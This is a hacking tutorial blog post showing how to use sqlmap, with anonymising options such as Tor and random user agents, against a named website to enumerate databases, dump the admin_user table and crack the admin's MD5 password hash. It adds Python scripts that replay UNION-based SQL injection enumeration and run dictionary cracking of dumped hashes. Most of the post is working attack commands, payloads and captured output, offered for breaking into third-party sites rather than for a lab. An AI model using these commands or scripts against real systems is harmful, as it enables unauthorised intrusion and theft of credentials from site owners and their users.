
Finding & hacking SQL Vulnerable Sites | BLACKBOx & SQLMAP | Part 2

sqlmap


There are many switches for sqlmap that affect the way it injects a website. They cover everything from staying anonymous during the attack to getting past a firewall/IDS.

In this tutorial we will focus on the essential switches that you will use on almost every run, which are:
-u     (the URL of our target, including the injectable parameter)
--random-agent     (send a randomly chosen browser User-Agent instead of sqlmap's own)
--dbs     (enumerate the database names)
-D     (select a database)
--tables     (list the tables of the selected database)
-T     (select a table)
--columns     (list the columns of the selected table)
-C     (select one or more columns)
--dump     (dump the contents of the selected columns)
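What these switches automate, as an added example that is not part of the original post: a Python script that replays the same enumeration by hand (the work behind --dbs, --tables, --columns and --dump) against a constructed in-memory SQLite database, with a hypothetical vulnerable_lookup() standing in for index.php?id=1. The page's target is MySQL, where sqlmap reads information_schema; here SQLite's sqlite_master and pragma_* table-valued functions stand in for it, and the two-table schema, the product row and the function names are all assumptions (the admin row reuses the username and hash shown later on the page). The hardened safe_lookup() beside it shows why a bound parameter stops the payload.

```python
import sqlite3

# Constructed stand-in for the sjw database (two tables are enough).
SCHEMA = """
CREATE TABLE products  (id INTEGER PRIMARY KEY, name TEXT, price REAL);
CREATE TABLE admin_user(id INTEGER PRIMARY KEY, admin_user_name TEXT, admin_pass TEXT);
INSERT INTO products   VALUES (1, 'widget', 10.5);
INSERT INTO admin_user VALUES (1, 'sjw', '15bed54f422df0895e16d15c2f3673d2');
"""


def open_db():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def vulnerable_lookup(con, id_param):
    """Hypothetical stand-in for index.php?id=...: the GET parameter is pasted
    straight into the SQL text, which is the bug sqlmap reported on 'id'."""
    sql = "SELECT id, name, price FROM products WHERE id=" + id_param
    return con.execute(sql).fetchall()


def safe_lookup(con, id_param):
    """Hardened form: the value is bound, so an injection payload is just a
    string that matches no id and nothing of it is parsed as SQL."""
    return con.execute("SELECT id, name, price FROM products WHERE id=?",
                       (id_param,)).fetchall()


def union_inject(con, column_expr, from_clause, ncols=3):
    """One UNION-based extraction: kill the real row with id=-1, then append
    rows whose first column carries the data we want. ncols must match the
    original SELECT's column count, which sqlmap finds by trial."""
    pad = ",NULL" * (ncols - 1)
    payload = f"-1 UNION SELECT {column_expr}{pad} FROM {from_clause}"
    # sorted() only makes the output order deterministic for the reader.
    return sorted(row[0] for row in vulnerable_lookup(con, payload))


def enum_databases(con):              # --dbs   (MySQL: information_schema.schemata)
    return union_inject(con, "name", "pragma_database_list")


def enum_tables(con):                 # -D db --tables   (MySQL: information_schema.tables)
    return union_inject(con, "name", "sqlite_master WHERE type='table'")


def enum_columns(con, table):         # -T table --columns   (MySQL: information_schema.columns)
    return union_inject(con, "name", f"pragma_table_info('{table}')")


def dump_column(con, table, column):  # -C column --dump
    return union_inject(con, column, table)


if __name__ == "__main__":
    db = open_db()
    print("dbs    :", enum_databases(db))
    print("tables :", enum_tables(db))
    print("columns:", enum_columns(db, "admin_user"))
    print("dump   :", dump_column(db, "admin_user", "admin_pass"))
    print("patched:", safe_lookup(db, "-1 UNION SELECT name,NULL,NULL FROM sqlite_master"))
```

Each enumeration switch is just a different FROM clause pushed through the same injectable parameter; that is why, once sqlmap has confirmed one parameter as injectable, the rest of the tutorial is only a matter of telling it which object to read next.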


Note: If you have Tor installed on your system, it is also a good idea to add the switch --tor, which routes sqlmap's requests through Tor so that your own IP address is not the one the target sees (and possibly bans). Add --check-tor as well so sqlmap verifies the connection really is going through Tor before it starts testing.
First, we will enumerate the databases of our target. Open a terminal and type:

sqlmap -u http://socialjusticewarrior.org/index.php?id=1 --random-agent --dbs

Here is some common output and the typical questions sqlmap asks. Note that the listing that follows is the table list of the sjw database, i.e. what the --tables step (-D sjw --tables) returns; the --dbs run itself reports the database names, and sjw is the one the -D sjw switch in the following commands refers to.

[info title="SQLMAP" icon="info-circle"]
[14:30:41] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[14:30:42] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] n
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
[/info]

[success title="OUTPUT" icon="check-circle"]
+-----------------------+
| language              |
| admin_modules         |
| admin_user            |
| adminmoduleaccess     |
| albums                |
| category              |
| events                |
| gallery               |
| left_panel_image      |
| login_history         |
| maillist              |
| member                |
| menumanager           |
| newsletter_subscriber |
| order_details         |
| orders                |
| pdfupload             |
| product_category      |
| product_category_old  |
| products              |
| resource_countries    |
| reviewmanager         |
| sitepages             |
| slide_box             |
+-----------------------+
[*]
[/success]


Let's try to obtain usernames and passwords. To do so, we simply pick the most promising-looking table (admin_user) and list its columns:


sqlmap -u http://socialjusticewarrior.org/index.php?id=1 --random-agent -D sjw -T admin_user --columns

[success title="OUTPUT" icon="check-circle"]
+----------------------+---------------------+
| Column               | Type                |
+----------------------+---------------------+
| admin_email          | varchar(80)         |
| admin_first_name     | varchar(45)         |
| admin_last_name      | varchar(45)         |
| admin_level          | smallint(6)         |
| admin_pass           | varchar(65)         |
| admin_status         | smallint(6)         |
| admin_user_name      | varchar(45)         |
| created              | int(15)             |
| id                   | bigint(20) unsigned |
| porn                 | int(15)             |
| login_attempt_failed | int(2)              |
| stuff_to_hate        | int(15)             |
| module_access        | varchar(255)        |
| security_token       | varchar(255)        |
+----------------------+---------------------+
[*]
[/success]

Now we choose a column to dump (the name given to -C has to match the --columns listing exactly):
sqlmap -u http://socialjusticewarrior.org/index.php?id=1 --random-agent -D sjw -T admin_user -C admin_user_name --dump


Here is an admin's username:

[success title="OUTPUT" icon="check-circle"]
+-----------------+
| admin_user_name |
+-----------------+
| sjw             |
+-----------------+
[/success]

Next, the other column of interest, admin_pass:
sqlmap -u http://socialjusticewarrior.org/index.php?id=1 --random-agent -D sjw -T admin_user -C admin_pass --dump


From the following prompts we can either store the recognised hashes in a temporary file, so they can be fed to another cracking tool (john, hashcat), or let sqlmap run its own dictionary attack on them.
[info title="SQLMAP" icon="check-circle"]
[14:41:51] [INFO] recognized possible password hashes in column 'admin_pass'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] n
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[14:42:31] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[/info]


The password hash was cracked in about 2 seconds by SQLMAP's default dictionary:
[success title="OUTPUT" icon="check-circle"]
+----------------------------------+
| admin_pass                       |
+----------------------------------+
| 15bed54f422df0895e16d15c2f3673d2 |
| ineedalife                       |
+----------------------------------+
[/success]
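What to do with the hashes once sqlmap recognises them, as an added example that is not part of the original post: triage each dumped value by its shape, run a dictionary attack with Python's hashlib, and write the leftovers out in the user:hash form that john and hashcat read, which is the route sqlmap's "store hashes to a temporary file" prompt is meant for. The rows, the wordlist and every username other than sjw are constructed for the example; the hash shapes table is an assumption, and length alone is only a heuristic (a 32-hex string could just as well be NTLM).

```python
import hashlib
import re

# Hex-digest length -> algorithms to try, in order. Length is only a heuristic
# (32 hex chars could also be NTLM or MD4); sqlmap also uses the column name and
# the DBMS to pick its 'hash method', as the md5_generic_passwd line shows.
HASH_SHAPES = {32: ("md5",), 40: ("sha1",), 64: ("sha256",)}
HEX_RE = re.compile(r"^[0-9a-f]+$")


def classify(value):
    """Candidate algorithms for a dumped value, or () if it does not look like a hash."""
    v = value.strip().lower()
    if HEX_RE.match(v) and len(v) in HASH_SHAPES:
        return HASH_SHAPES[len(v)]
    return ()


def crack(rows, wordlist):
    """rows: (username, value) pairs as dumped with -C admin_user_name,admin_pass.
    Returns (cracked, uncracked, skipped): {user: plaintext}, hash pairs no word
    matched, and pairs that were not hashes at all (e.g. a plaintext column)."""
    cracked, uncracked, skipped = {}, [], []
    for user, value in rows:
        target = value.strip().lower()
        algos = classify(target)
        if not algos:
            skipped.append((user, value))
            continue
        hit = None
        for word in wordlist:
            for algo in algos:
                if hashlib.new(algo, word.encode()).hexdigest() == target:
                    hit = word
                    break
            if hit is not None:
                break
        if hit is None:
            uncracked.append((user, target))
        else:
            cracked[user] = hit
    return cracked, uncracked, skipped


def john_lines(uncracked):
    """user:hash lines for a file you hand to john or hashcat --username."""
    return [f"{user}:{h}" for user, h in uncracked]


# Constructed sample data standing in for the admin_user dump on the page;
# the hashes are computed here so the example is self-contained.
SAMPLE_ROWS = [
    ("sjw", hashlib.md5(b"ineedalife").hexdigest()),
    ("alice", hashlib.sha1(b"summer2016").hexdigest()),
    ("bob", hashlib.md5(b"Tr0ub4dor&3").hexdigest()),   # not in the wordlist
    ("carol", "not-a-hash-at-all"),                      # plaintext value, skipped
]
WORDLIST = ["password", "123456", "ineedalife", "summer2016", "letmein"]

if __name__ == "__main__":
    cracked, left, skipped = crack(SAMPLE_ROWS, WORDLIST)
    for user, pw in cracked.items():
        print(f"cracked   {user}: {pw}")
    for line in john_lines(left):
        print(f"to john   {line}")
    for user, value in skipped:
        print(f"not a hash {user}: {value}")
```

Unsalted MD5 like the admin_pass column here falls to a small wordlist in seconds, which is exactly what the sqlmap run on the page shows; anything left over after the default dictionary is better handed to john or hashcat with rules and a larger list than re-run through sqlmap.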



Note: you can dump multiple columns at once, which is more practical. Separate them with commas and no spaces (a space would split the list into separate arguments), for example: -C admin_user_name,admin_pass,id --dump

GrayHatHackers

Twitter: https://twitter.com/ghhackers
